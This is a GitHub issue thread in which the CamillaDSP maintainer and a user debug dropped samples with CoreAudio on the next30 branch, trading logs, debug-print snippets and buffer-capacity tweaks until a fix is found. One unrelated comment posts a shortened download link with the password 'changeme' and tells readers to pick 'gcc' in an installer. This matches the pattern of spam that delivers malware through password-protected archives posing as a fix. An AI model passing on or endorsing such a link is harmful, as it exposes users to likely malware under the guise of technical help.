### ISSUE TITLE
next30 - CoreAudio - Dropping 1 sample

### ISSUE THREAD

**Issue by siraaris** [HEnquist/camilladsp#355]
On next30 branch, CoreAudio devices using BlackHole with Internal Adjustable, I'm finding that after 30min or so, a misalignment of sorts is introduced with the following in the trace/log:

2024-08-28 02:48:42.431518 WARN [src/coreaudiodevice.rs:866] Samples were dropped, missing 1 buffers
2024-08-28 02:48:42.516816 DEBUG [src/coreaudiodevice.rs:721] Dropping captured chunk 2318239 with len 4096

Once this starts happening, things don't seem to get worse, but don't improve either, but clearly a stop/start of camilladsp is required to get things working again (at least for a while).

There are a few (5) "Restarting playback after buffer underrun" in the log as well...

Attaching config and log files.
[Camilla-v3-CoreAudio-Dropped-Samples.txt](https://github.com/user-attachments/files/16766232/Camilla-v3-CoreAudio-Dropped-Samples.txt)
[keystone-bedrock-v5-v3.txt](https://github.com/user-attachments/files/16766233/keystone-bedrock-v5-v3.txt)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by HEnquist** [comment]
Can you try increasing the channel capacity here?
https://github.com/HEnquist/camilladsp/blob/bc202f26dbd18ea1560ceeb64b4231a0ba258ee7/src/coreaudiodevice.rs#L667
Change the 8 to 16 to begin with.

**Comment by siraaris** [comment]
WIll do. As a note, the same config (albeit modified back to v2 format), runs stable on v2 CamillaDSP - no issue observed running for 12h overnight.

**Comment by siraaris** [comment]
Increased factor from 8 to 16 and it seems better (for a few hours now). Will report back over the next 24-48 hours.

**Comment by siraaris** [comment]
Increasing from 8 to 16 didn't stop the issue - it recurred, maybe took a little longer (but that's not verified). I'll try increasing to 32?
[Uploading camilladsp-2024-08-28.txt…]()

**Comment by HEnquist** [comment]
You could try 32. I'm quite surprised that v2 works better, there are almost no changes in the CoreAudio code from v2 to v3.

**Comment by HEnquist** [comment]
Instead of increasing more, try removing the +2 here:
https://github.com/HEnquist/camilladsp/blob/bc202f26dbd18ea1560ceeb64b4231a0ba258ee7/src/coreaudiodevice.rs#L671

**Comment by siraaris** [comment]
Ok. Running with above change. So I see this on startup.

2024-08-28 23:33:16.996213 DEBUG [src/coreaudiodevice.rs:392] Using a playback channel capacity of 1 chunks.

**Comment by siraaris** [comment]
A brief note after an evening's listening - the above change (remove the +2 in line 671) has behaved well over the course of 6 hours or so, no glitches. Will check in again tomorrow.

**Comment by HEnquist** [comment]
Looking a bit closer, removing that +2 can cause some trouble. Can you put it back again, and insert this print instead?
```
713                    for (databyte, bufferbyte) in data.buffer.iter().zip(new_data.iter_mut()) {
714                        *bufferbyte = *databyte;
715                    }
+++                    if chunk_counter%1000 == 0 {
+++                        println!("tx_dev fill {} / {}", tx_dev.len(), tx_dev.capacity().unwrap());
+++                    }
716                    match tx_dev.try_send((chunk_counter, length_bytes, new_data)) {
```

Then please let it run for a while to see what it prints, preferably until the problem happens. Normally it should say "tx_dev fill 0 / 257" (possibly with a different second number). The first number should be zero most of the time, and not start increasing.

**Comment by siraaris** [comment]
Ok, running with above and will report back.

**Comment by siraaris** [comment]
Seemed to be hovering around the top end... but not exhibiting dropping samples. When I played a different track (Roon), bang - the problem started (although the fill level didn't ever report higher than 256).

Maybe started when it hit 256 as reported.

**Comment by HEnquist** [comment]
Another idea.. looks like rate adjust isn't working properly. Can you try changing the +1 here to +3?
https://github.com/HEnquist/camilladsp/blob/bc202f26dbd18ea1560ceeb64b4231a0ba258ee7/src/coreaudiodevice.rs#L391

**Comment by siraaris** [comment]
Running with changing +1 to +3 as above, I observe:

tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 10 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257
tx_dev fill 0 / 257

Unlike the previous behaviour, this configuration settles back down.

**Comment by siraaris** [comment]
More information. The tx_dev fill remains almost exclusively at 0 / 257 - over 4 hours only once did it deviate (tx_dev fill 10 / 257).

Unfortunately in that same 4 hour period there were 380 Restart reported:

2024-08-30 03:24:13.054772 DEBUG [src/coreaudiodevice.rs:923] Measured sample rate is 191740.4 Hz
2024-08-30 03:24:13.054813 DEBUG [src/coreaudiodevice.rs:940] Rate watcher, measured sample rate is 191740.1 Hz
2024-08-30 03:24:13.435218 WARN [src/coreaudiodevice.rs:460] Playback interrupted, no data available
2024-08-30 03:24:13.439086 INFO [src/coreaudiodevice.rs:451] Restarting playback after buffer underrun
2024-08-30 03:24:14.080094 DEBUG [src/coreaudiodevice.rs:923] Measured sample rate is 191747.7 Hz

**Comment by HEnquist** [comment]
What did the rate adjust messages say about buffer level?

**Comment by siraaris** [comment]
Attaching the rate messages.
[Uploading cdsp-rate-messages.txt…]()

**Comment by siraaris** [comment]
[cdsp-rate-messages.txt](https://github.com/user-attachments/files/16812647/cdsp-rate-messages.txt)

**Comment by siraaris** [comment]
I've analysed the observed load, and rough alignment with "Restarting playback after buffer underrun" logs.

<img width="1212" alt="Screenshot 2024-08-31 at 3 21 49 AM" src="https://github.com/user-attachments/assets/2b8d3f1c-ce22-44ae-8093-a8849bccf0a4">

I'm guessing here that the camilladsp process swaps around from an Efficiency to Performance core, based on the volatility of the load reported by Camilla.

**Comment by siraaris** [comment]
Apologies, this is a separate investigation, will start a different issue once I've explored further.

**Comment by HEnquist** [comment]
It's possible to set change the scheduling profile for apps on macOS. Now camilladsp just uses the default, but it could make sense to try a raising the priority. But yes that's a separate issue :)

**Comment by siraaris** [comment]
Back onto this issue, this is graph of what "Current buffer level" is reporting.
<img width="1269" alt="Screenshot 2024-08-31 at 3 20 57 PM" src="https://github.com/user-attachments/assets/935dbffe-dd4c-498a-be42-4970af0332f8">

**Comment by siraaris** [comment]
Restarts are aligned to the above - when the "uptick, crash, rebalance" is occurring, camilladsp is restarting.

The same data as above, just plotting "1" for restart (not very rich, but shows the times) - 
<img width="1334" alt="Screenshot 2024-08-31 at 3 46 42 PM" src="https://github.com/user-attachments/assets/0ba2f65d-3d09-4114-b964-c1c71ebb6049">

**Comment by siraaris** [comment]
Please note - the load plot also provided above is not aligned to the same time series of data for the above two - although I suspect that load may be contributing.

**Comment by siraaris** [comment]
Maybe pause on this for a bit.

Increasing chunksize from 16k -> 32k, and queuelimit from 8 -> 4 has stabilised this for the moment. I'll leave it running for a while and report back.

**Comment by HEnquist** [comment]
I'll start looking into thread priorities on macOS as soon as I have some time.

**Comment by siraaris** [comment]
I've created a separate issue :) I do think there is a connection between the two issues, but not sure yet. 

My comment above (upping the chunksize) was not stable in the end, observed logged restarts etc overnight.

**Comment by siraaris** [comment]
Well, the 1 sample issue seems to be addressed with the +3 change so we can probably close this one.

**Comment by HEnquist** [comment]
I have added this fix to next30 now. I'm closing this since it doesn't seem to affect the current release.
